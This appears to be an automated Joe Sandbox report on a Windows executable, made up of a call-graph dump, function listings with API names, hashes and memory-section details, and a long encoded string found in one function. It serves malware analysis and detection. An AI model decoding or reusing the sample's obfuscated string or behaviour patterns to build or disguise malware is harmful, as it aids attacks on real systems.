4844 7ff749f41394 2 API calls 4842->4844 4843->4842 4845 7ff749f414d1 4844->4845 4846 7ff749f414d6 4845->4846 4847 7ff749f41394 2 API calls 4845->4847 4848 7ff749f41394 2 API calls 4846->4848 4847->4846 4849 7ff749f414e0 4848->4849 4850 7ff749f414e5 4849->4850 4851 7ff749f41394 2 API calls 4849->4851 4852 7ff749f41394 2 API calls 4850->4852 4851->4850 4853 7ff749f414ef 4852->4853 4854 7ff749f414f4 4853->4854 4855 7ff749f41394 2 API calls 4853->4855 4856 7ff749f41394 2 API calls 4854->4856 4855->4854 4857 7ff749f414fe 4856->4857 4858 7ff749f41394 2 API calls 4857->4858 4859 7ff749f41503 4858->4859 4860 7ff749f41394 2 API calls 4859->4860 4861 7ff749f41512 4860->4861 4862 7ff749f41394 2 API calls 4861->4862 4863 7ff749f41521 4862->4863 4864 7ff749f41530 4863->4864 4865 7ff749f41394 2 API calls 4863->4865 4866 7ff749f41394 2 API calls 4864->4866 4865->4864 4867 7ff749f4153a 4866->4867 4868 7ff749f4153f 4867->4868 4869 7ff749f41394 2 API calls 4867->4869 4870 7ff749f41394 2 API calls 4868->4870 4869->4868 4871 7ff749f4154e 4870->4871 4872 7ff749f41394 2 API calls 4871->4872 4873 7ff749f41558 4872->4873 4874 7ff749f4155d 4873->4874 4875 7ff749f41394 2 API calls 4873->4875 4876 7ff749f41394 2 API calls 4874->4876 4875->4874 4877 7ff749f41567 4876->4877 4878 7ff749f4156c 4877->4878 4879 7ff749f41394 2 API calls 4877->4879 4880 7ff749f41394 2 API calls 4878->4880 4879->4878 4881 7ff749f41576 4880->4881 4882 7ff749f4157b 4881->4882 4883 7ff749f41394 2 API calls 4881->4883 4884 7ff749f41394 2 API calls 4882->4884 4883->4882 4885 7ff749f41585 4884->4885 4886 7ff749f4158a 4885->4886 4887 7ff749f41394 2 API calls 4885->4887 4888 7ff749f41394 2 API calls 4886->4888 4887->4886 4889 7ff749f41599 4888->4889 4890 7ff749f41394 2 API calls 4889->4890 4891 7ff749f415a3 4890->4891 4892 7ff749f415a8 4891->4892 4893 7ff749f41394 2 API calls 4891->4893 4894 7ff749f41394 2 API calls 4892->4894 4893->4892 4895 7ff749f415b7 4894->4895 4896 7ff749f41394 2 API calls 4895->4896 4897 7ff749f415c1 4896->4897 4898 7ff749f415c6 4897->4898 4899 7ff749f41394 2 API calls 4897->4899 4900 7ff749f41394 2 API calls 4898->4900 4899->4898 4901 7ff749f415d0 4900->4901 4902 7ff749f415d5 4901->4902 4903 7ff749f41394 2 API calls 4901->4903 4904 7ff749f41394 2 API calls 4902->4904 4903->4902 4905 7ff749f415df 4904->4905 4906 7ff749f415e4 4905->4906 4907 7ff749f41394 2 API calls 4905->4907 4908 7ff749f41394 2 API calls 4906->4908 4907->4906 4909 7ff749f415f3 4908->4909 4909->4214 4911 7ff749f41394 2 API calls 4910->4911 4912 7ff749f4143b 4911->4912 4913 7ff749f41440 4912->4913 4914 7ff749f41394 2 API calls 4912->4914 4915 7ff749f41394 2 API calls 4913->4915 4914->4913 4916 7ff749f4144f 4915->4916 4917 7ff749f41394 2 API calls 4916->4917 4918 7ff749f41459 4917->4918 4919 7ff749f4145e 4918->4919 4920 7ff749f41394 2 API calls 4918->4920 4921 7ff749f41394 2 API calls 4919->4921 4920->4919 4922 7ff749f41468 4921->4922 4923 7ff749f4146d 4922->4923 4924 7ff749f41394 2 API calls 4922->4924 4925 7ff749f41394 2 API calls 4923->4925 4924->4923 4926 7ff749f41477 4925->4926 4927 7ff749f4147c 4926->4927 4928 7ff749f41394 2 API calls 4926->4928 4929 7ff749f41394 2 API calls 4927->4929 4928->4927 4930 7ff749f41486 4929->4930 4931 7ff749f4148b 4930->4931 4932 7ff749f41394 2 API calls 4930->4932 4933 7ff749f41394 2 API calls 4931->4933 4932->4931 4934 7ff749f41495 4933->4934 4935 7ff749f4149a 4934->4935 4936 7ff749f41394 2 API calls 4934->4936 4937 7ff749f41394 2 API calls 4935->4937 4936->4935 4938 7ff749f414a4 4937->4938 4939 7ff749f414a9 4938->4939 4940 7ff749f41394 2 API calls 4938->4940 4941 7ff749f41394 2 API calls 4939->4941 4940->4939 4942 7ff749f414b3 4941->4942 4943 7ff749f414b8 4942->4943 4944 7ff749f41394 2 API calls 4942->4944 4945 7ff749f41394 2 API calls 4943->4945 4944->4943 4946 7ff749f414c2 4945->4946 4947 7ff749f414c7 4946->4947 4948 7ff749f41394 2 API calls 4946->4948 4949 7ff749f41394 2 API calls 4947->4949 4948->4947 4950 7ff749f414d1 4949->4950 4951 7ff749f414d6 4950->4951 4952 7ff749f41394 2 API calls 4950->4952 4953 7ff749f41394 2 API calls 4951->4953 4952->4951 4954 7ff749f414e0 4953->4954 4955 7ff749f414e5 4954->4955 4956 7ff749f41394 2 API calls 4954->4956 4957 7ff749f41394 2 API calls 4955->4957 4956->4955 4958 7ff749f414ef 4957->4958 4959 7ff749f414f4 4958->4959 4960 7ff749f41394 2 API calls 4958->4960 4961 7ff749f41394 2 API calls 4959->4961 4960->4959 4962 7ff749f414fe 4961->4962 4963 7ff749f41394 2 API calls 4962->4963 4964 7ff749f41503 4963->4964 4965 7ff749f41394 2 API calls 4964->4965 4966 7ff749f41512 4965->4966 4967 7ff749f41394 2 API calls 4966->4967 4968 7ff749f41521 4967->4968 4969 7ff749f41530 4968->4969 4970 7ff749f41394 2 API calls 4968->4970 4971 7ff749f41394 2 API calls 4969->4971 4970->4969 4972 7ff749f4153a 4971->4972 4973 7ff749f4153f 4972->4973 4974 7ff749f41394 2 API calls 4972->4974 4975 7ff749f41394 2 API calls 4973->4975 4974->4973 4976 7ff749f4154e 4975->4976 4977 7ff749f41394 2 API calls 4976->4977 4978 7ff749f41558 4977->4978 4979 7ff749f4155d 4978->4979 4980 7ff749f41394 2 API calls 4978->4980 4981 7ff749f41394 2 API calls 4979->4981 4980->4979 4982 7ff749f41567 4981->4982 4983 7ff749f4156c 4982->4983 4984 7ff749f41394 2 API calls 4982->4984 4985 7ff749f41394 2 API calls 4983->4985 4984->4983 4986 7ff749f41576 4985->4986 4987 7ff749f4157b 4986->4987 4988 7ff749f41394 2 API calls 4986->4988 4989 7ff749f41394 2 API calls 4987->4989 4988->4987 4990 7ff749f41585 4989->4990 4991 7ff749f4158a 4990->4991 4992 7ff749f41394 2 API calls 4990->4992 4993 7ff749f41394 2 API calls 4991->4993 4992->4991 4994 7ff749f41599 4993->4994 4995 7ff749f41394 2 API calls 4994->4995 4996 7ff749f415a3 4995->4996 4997 7ff749f415a8 4996->4997 4998 7ff749f41394 2 API calls 4996->4998 4999 7ff749f41394 2 API calls 4997->4999 4998->4997 5000 7ff749f415b7 4999->5000 5001 7ff749f41394 2 API calls 5000->5001 5002 7ff749f415c1 5001->5002 5003 7ff749f415c6 5002->5003 5004 7ff749f41394 2 API calls 5002->5004 5005 7ff749f41394 2 API calls 5003->5005 5004->5003 5006 7ff749f415d0 5005->5006 5007 7ff749f415d5 5006->5007 5008 7ff749f41394 2 API calls 5006->5008 5009 7ff749f41394 2 API calls 5007->5009 5008->5007 5010 7ff749f415df 5009->5010 5011 7ff749f415e4 5010->5011 5012 7ff749f41394 2 API calls 5010->5012 5013 7ff749f41394 2 API calls 5011->5013 5012->5011 5014 7ff749f415f3 5013->5014 5014->4218 5025 7ff749f42320 strlen 5026 7ff749f42337 5025->5026 5090 7ff749f41000 5091 7ff749f4108b __set_app_type 5090->5091 5092 7ff749f41040 5090->5092 5093 7ff749f410b6 5091->5093 5092->5091 5094 7ff749f410e5 5093->5094 5096 7ff749f41e00 5093->5096 5097 7ff749f487d0 __setusermatherr 5096->5097 5098 7ff749f41800 5099 7ff749f41812 5098->5099 5100 7ff749f41835 fprintf 5099->5100 5066 7ff749f41e65 5067 7ff749f41e67 signal 5066->5067 5068 7ff749f41e7c 5067->5068 5070 7ff749f41e99 5067->5070 5069 7ff749f41e82 signal 5068->5069 5068->5070 5069->5070 5101 7ff749f42104 5102 7ff749f42218 5101->5102 5103 7ff749f42111 EnterCriticalSection 5101->5103 5104 7ff749f42272 5102->5104 5107 7ff749f42241 DeleteCriticalSection 5102->5107 5109 7ff749f42230 free 5102->5109 5105 7ff749f4212e 5103->5105 5106 7ff749f4220b LeaveCriticalSection 5103->5106 5105->5106 5108 7ff749f4214d TlsGetValue GetLastError 5105->5108 5106->5102 5107->5104 5108->5105 5109->5107 5109->5109 5035 7ff749f41ac3 5036 7ff749f41a70 5035->5036 5037 7ff749f4199e 5036->5037 5038 7ff749f41b36 5036->5038 5041 7ff749f41b53 5036->5041 5039 7ff749f41a0f 5037->5039 5042 7ff749f419e9 VirtualProtect 5037->5042 5040 7ff749f41ba0 4 API calls 5038->5040 5040->5041 5042->5037 5048 7ff749f42050 5049 7ff749f4205e EnterCriticalSection 5048->5049 5050 7ff749f420cf 5048->5050 5051 7ff749f420c2 LeaveCriticalSection 5049->5051 5052 7ff749f42079 5049->5052 5051->5050 5052->5051 5053 7ff749f420bd free 5052->5053 5053->5051 5054 7ff749f41fd0 5055 7ff749f42033 5054->5055 5056 7ff749f41fe4 5054->5056 5056->5055 5057 7ff749f41ffd EnterCriticalSection LeaveCriticalSection 5056->5057 5057->5055 5079 7ff749f41a70 5080 7ff749f4199e 5079->5080 5083 7ff749f41a7d 5079->5083 5081 7ff749f41a0f 5080->5081 5082 7ff749f419e9 VirtualProtect 5080->5082 5082->5080 5083->5079 5084 7ff749f41b53 5083->5084 5085 7ff749f41b36 5083->5085 5086 7ff749f41ba0 4 API calls 5085->5086 5086->5084 5110 7ff749f41e10 5111 7ff749f41e2f 5110->5111 5112 7ff749f41e55 5111->5112 5113 7ff749f41ecc 5111->5113 5117 7ff749f41eb5 5111->5117 5112->5117 5118 7ff749f41f12 signal 5112->5118 5114 7ff749f41ed3 signal 5113->5114 5113->5117 5115 7ff749f41ee4 5114->5115 5114->5117 5116 7ff749f41eea signal 5115->5116 5115->5117 5116->5117 5118->5117 5087 7ff749f4216f 5088 7ff749f42178 InitializeCriticalSection 5087->5088 5089 7ff749f42185 5087->5089 5088->5089 5015 7ff749f41394 5016 7ff749f48240 malloc 5015->5016 5017 7ff749f413b8 5016->5017 5018 7ff749f413c6 NtTerminateProcess 5017->5018 5027 7ff749f41ab3 5028 7ff749f41a70 5027->5028 5028->5027 5029 7ff749f41b36 5028->5029 5032 7ff749f41b53 5028->5032 5033 7ff749f4199e 5028->5033 5031 7ff749f41ba0 4 API calls 5029->5031 5030 7ff749f41a0f 5031->5032 5033->5030 5034 7ff749f419e9 VirtualProtect 5033->5034 5034->5033

                                                                                Executed Functions

                                                                                Function 00007FF749F41160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction ID: fe3c8a29ac9a653aebd1f9f7110b811fba32ba84110e283ec0fdda04b0ccecbd
                                                                                • Opcode Fuzzy Hash: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction Fuzzy Hash: AA512831B8D696C1F710FF29E950B79A7B5AFA4B80FC05031DA0D877E2DE2CA4918720
                                                                                Function 00007FF749F41394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtTerminateProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF749F41156), ref: 00007FF749F413F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction ID: bf1d96b365fc8e541252a8b72505a172072ffff6911326fb091291ea3ce489eb
                                                                                • Opcode Fuzzy Hash: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction Fuzzy Hash: F4F0A47195CB41CAD714FF5AB84082AA770FBA8782B804439EA9C4266ADF3CE1508B60

                                                                                Non-executed Functions

                                                                                Function 00007FF749F43B60 Relevance: 128.2, APIs: 69, Strings: 3, Instructions: 2197COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • OiPpem9wdXluZnhyk5pkdsx1dnhmZHJuNmRhdWNmbm93eXl6bHB1eWpmeHJsZWR2dHV2eGZkcm52ZGF1s2ZubwQLw3RsxHy0S955PqFEMB4dBlYIFAsVHBcJQRYCCAAAA1kbH0wCABdKDxZSKCo3VhkaEh1IaX9kUmRhdWNmbm882dHnY7Gzt2WnvrxjpKK4MMy2t2iltKAy3aa6Y6eooXi4vrQDsbO3Uye2vWSkorhNNE+2aKW0oE8lpbptp6ihJRAa, xrefs: 00007FF749F45124
                                                                                • , xrefs: 00007FF749F45753
                                                                                • X&, xrefs: 00007FF749F462CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                                                • String ID: $OiPpem9wdXluZnhyk5pkdsx1dnhmZHJuNmRhdWNmbm93eXl6bHB1eWpmeHJsZWR2dHV2eGZkcm52ZGF1s2ZubwQLw3RsxHy0S955PqFEMB4dBlYIFAsVHBcJQRYCCAAAA1kbH0wCABdKDxZSKCo3VhkaEh1IaX9kUmRhdWNmbm882dHnY7Gzt2WnvrxjpKK4MMy2t2iltKAy3aa6Y6eooXi4vrQDsbO3Uye2vWSkorhNNE+2aKW0oE8lpbptp6ihJRAa$X&
                                                                                • API String ID: 3604702941-1492181059
                                                                                • Opcode ID: 7f0efb7b49730ebeb84e69c2c52a15baaeeebae0b5016ad7693f10e129db55ae
                                                                                • Instruction ID: 019ef6760616db660c28e65dce5b3daf24a20159c9b6287bfa24360c12a29307
                                                                                • Opcode Fuzzy Hash: 7f0efb7b49730ebeb84e69c2c52a15baaeeebae0b5016ad7693f10e129db55ae
                                                                                • Instruction Fuzzy Hash: 6F537A61D2CAC3C4F711BF28B8016F4E770AFA5388FD45271EA8C565A2EF6C6284D764
                                                                                Function 00007FF749F43350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 4263182637-1413854666
                                                                                • Opcode ID: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction ID: a1e379d548c1b5b274e88bcde890c4be73a3be02ca59d4cceb38fa077b52a87d
                                                                                • Opcode Fuzzy Hash: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction Fuzzy Hash: 64B18C2294C6C2C5F721BF14F8457AABBB0FFA1348F900135EA8856AA5DF7DE149CB50
                                                                                Function 00007FF749F42690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 329590056-2527496196
                                                                                • Opcode ID: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction ID: 9f4c0da3f2d1ebb849236831819a49982a916ff86ac7e1f8a4534dc764df3edf
                                                                                • Opcode Fuzzy Hash: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction Fuzzy Hash: B1025922A1CBC2C1F720AF15E8047AAABA0FB95794F904235EAAC437E5DF7CD145DB50
                                                                                Function 00007FF749F41BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF749F4A53C,00007FF749F4A53C,?,?,00007FF749F40000,?,00007FF749F41991), ref: 00007FF749F41C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF749F4A53C,00007FF749F4A53C,?,?,00007FF749F40000,?,00007FF749F41991), ref: 00007FF749F41CC7
                                                                                • memcpy.MSVCRT ref: 00007FF749F41CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF749F4A53C,00007FF749F4A53C,?,?,00007FF749F40000,?,00007FF749F41991), ref: 00007FF749F41D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction ID: 9e4cf94f7c8ca5c42cc14b73de2d869f4b66e38287b7bb4a989ae719059feddc
                                                                                • Opcode Fuzzy Hash: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction Fuzzy Hash: 97414D61B8C656C5EB10BF45E884EB9A770EB64BC4F954131DA0E437E1DE3CE585C720
                                                                                Function 00007FF749F42104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                • String ID:
                                                                                • API String ID: 3326252324-0
                                                                                • Opcode ID: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction ID: 8085ef7941c7c9807d003461f6e58259d56b9833cca41f81f8e94de6608e8567
                                                                                • Opcode Fuzzy Hash: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction Fuzzy Hash: 24210621A8DA83C1FB19BF55E940BB4A270BF61B80FE50070DA1D576E4CF2CE9969720
                                                                                Function 00007FF749F41E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 652 7ff749f41e10-7ff749f41e2d 653 7ff749f41e3e-7ff749f41e48 652->653 654 7ff749f41e2f-7ff749f41e38 652->654 655 7ff749f41e4a-7ff749f41e53 653->655 656 7ff749f41ea3-7ff749f41ea8 653->656 654->653 657 7ff749f41f60-7ff749f41f69 654->657 658 7ff749f41ecc-7ff749f41ed1 655->658 659 7ff749f41e55-7ff749f41e60 655->659 656->657 660 7ff749f41eae-7ff749f41eb3 656->660 663 7ff749f41f23-7ff749f41f2d 658->663 664 7ff749f41ed3-7ff749f41ee2 signal 658->664 659->656 661 7ff749f41efb-7ff749f41f0a call 7ff749f487e0 660->661 662 7ff749f41eb5-7ff749f41eba 660->662 661->663 674 7ff749f41f0c-7ff749f41f10 661->674 662->657 667 7ff749f41ec0 662->667 665 7ff749f41f2f-7ff749f41f3f 663->665 666 7ff749f41f43-7ff749f41f45 663->666 664->663 668 7ff749f41ee4-7ff749f41ee8 664->668 673 7ff749f41f5a 665->673 666->657 667->663 670 7ff749f41eea-7ff749f41ef9 signal 668->670 671 7ff749f41f4e-7ff749f41f53 668->671 670->657 671->673 673->657 675 7ff749f41f12-7ff749f41f21 signal 674->675 676 7ff749f41f55 674->676 675->657 675->663 676->673
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction ID: 04cbe491f59a6cd96c936cb8caa1d954cc61bb5bcab34498fd83a60e319f48fa
                                                                                • Opcode Fuzzy Hash: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction Fuzzy Hash: 32219C25F9C126C1FB647E149690F7991A19FB47B4FA48131DE1D433D4DE6CB8838361
                                                                                Function 00007FF749F41880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
